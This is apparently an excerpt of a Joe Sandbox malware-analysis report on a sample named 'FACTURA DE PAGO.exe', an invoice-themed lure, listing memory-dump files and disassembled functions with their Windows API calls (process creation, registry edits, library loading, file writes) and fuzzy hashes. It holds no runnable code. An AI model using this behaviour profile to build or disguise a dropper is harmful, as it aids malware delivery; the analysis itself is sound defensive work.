Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D

Function 004054C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
CloseHandle.KERNEL32(?), ref: 004054F6

Strings

Error launching installer, xrefs: 004054D3

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79

Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004

Part of subcall function 004054C0: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
Part of subcall function 004054C0: CloseHandle.KERNEL32(?), ref: 004054F6

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: fa6371b051929d11490b6b0237e04c3ddcee680ab82e9b2704d90c07df1b053f
Instruction ID: 17c2ba3ee0df36fac51d80065c7f5b12f0089491b6a7036ff5f4409f8054ee18
Opcode Fuzzy Hash: fa6371b051929d11490b6b0237e04c3ddcee680ab82e9b2704d90c07df1b053f
Instruction Fuzzy Hash: 3A014031904114EBEF11AFA1CD8999F7B76EF00358F10817BF601B62E1C7795A419B9A

Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
RegCloseKey.ADVAPI32(?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: ec8dd42a2d0ea345b8cd5bbdd5168a1da3feeb0db291650b5b2d283f8041d553
Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
Opcode Fuzzy Hash: ec8dd42a2d0ea345b8cd5bbdd5168a1da3feeb0db291650b5b2d283f8041d553
Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D

Function 00402308 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
RegCloseKey.ADVAPI32(00000000), ref: 00402330

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 0df6b1a3f6ceee7d43e4221d77fb77a885781458b791b3427230b76ffe70b956
Instruction ID: 0b5ea08ab0382a988395d3fa8ff755f3119953e7a6b53afab80e2150babb3da0
Opcode Fuzzy Hash: 0df6b1a3f6ceee7d43e4221d77fb77a885781458b791b3427230b76ffe70b956
Instruction Fuzzy Hash: E9F04433A00110ABEB10BBA48A4EAAE72699B54344F14443BF201B71C1D9BD4D12966D

Function 004060C8 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
GetProcAddress.KERNEL32(00000000,?), ref: 004060F5

Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669

Function 004059A2 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\FACTURA DE PAGO.exe,80000000,00000003), ref: 004059A6
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26

Function 0040597D Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405996

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
Instruction ID: d845d86c17b980f18525549d7b015dd21524309b6d76b06211fdae883a44da1e
Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
Instruction Fuzzy Hash: DED01272908121BFC2102728ED0C89FBF65EB543727018B31FDB9E22F0D7304C568AA6

Function 0040548B Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
GetLastError.KERNEL32 ref: 0040549F

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
Instruction ID: a4c09d903a68db5e1e5a8a61abb96ed160ccf8e5b17bdb7d1f8a9ed05c9a91ae
Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
Instruction Fuzzy Hash: 9FC04C30629541EADA515B209E097577E54AB50742F2045756606E10E0D6349551D92E

Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
Instruction ID: d438f0a484ed9c160f568b140fbb6a6f0821f4cba08bd088e2e240e06c4f75a3
Opcode Fuzzy Hash: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
Instruction Fuzzy Hash: 5FE04676240208AFDB00EFA9ED4AFA637ECBB18705F008425B609E60A1C678E5508B69

Function 00405A49 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction ID: 4baa6dbb94b5aed14ede1987b2b874979685841cdf923a54f3be7db8892ddb6c
Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction Fuzzy Hash: 65E0EC3265425EAFDF109E659C40EEB7BACEB053A0F008933F925E2150D231E821DFA9

Function 00405A1A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
Instruction ID: b949637607fe9c5fc006a161b6664aa16a088e5f06d71f7b71a40b2ab1c7b417
Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
Instruction Fuzzy Hash: 80E0EC3261425AABDF109E959C40FEB7B6CEF45360F048532F915E6590E231E8219FA9

Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 458389e1991e1a908742f437881805813113f4244f4ccb02aaaba390b89fa544
Instruction ID: 6a3e57155666377f6ae5a5c5a230e2cf9c2db004969d7e98ca1d37c028e4fb03
Opcode Fuzzy Hash: 458389e1991e1a908742f437881805813113f4244f4ccb02aaaba390b89fa544
Instruction Fuzzy Hash: A2D05B33B14100DBDB10EBE5DF08A9D73A5BB60329B308637D201F21D1D7B9C9559B29

Function 00403F60 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(0001048A,00000000,00000000,00000000), ref: 00403F72

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

